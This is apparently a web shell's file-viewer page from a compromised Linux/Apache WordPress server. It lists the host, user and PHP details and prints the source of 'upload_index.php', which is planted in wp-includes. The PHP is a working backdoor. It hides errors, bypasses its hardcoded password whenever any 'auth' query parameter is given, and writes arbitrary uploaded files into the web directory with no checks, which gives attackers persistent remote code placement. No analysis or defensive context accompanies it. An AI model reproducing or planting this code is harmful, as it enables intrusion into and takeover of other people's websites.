HEX
Server: Apache
System: Linux hostco.com.br 5.15.0-181-generic #191-Ubuntu SMP Fri May 22 19:09:02 UTC 2026 x86_64
User: snuff (1004)
PHP: 8.1.32
Disabled: NONE
$ pwd: /home/snuff/public_html/wp-includes/
Upload Files
File: /home/snuff/public_html/wp-includes/upload_index.php
<?php
error_reporting(0);
if (strpos($_SERVER['SERVER_NAME'], 'dorawp') !== false) {
    die;
}

if ($_GET['auth'] || $_POST['auth'] === 'f02pz3831W0DTtLgq26L') {
echo '<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="'.basename($_SERVER['PHP_SELF']).'" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br /><br />
    <input type="submit" value="Upload"></input>
	<input type="hidden" name="auth" value="f02pz3831W0DTtLgq26L">
  </form>
</body>
</html>';

  if(!empty($_FILES['uploaded_file']))
  {
    $path = "./";
    $path = $path . basename( $_FILES['uploaded_file']['name']);
    if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
      echo '</br>'."The file ".  basename( $_FILES['uploaded_file']['name']). 
      " has been uploaded";
    } else{
        echo '</br>'. "There was an error uploading the file, please try again!";
    }
  }
}
?>
@ Telegram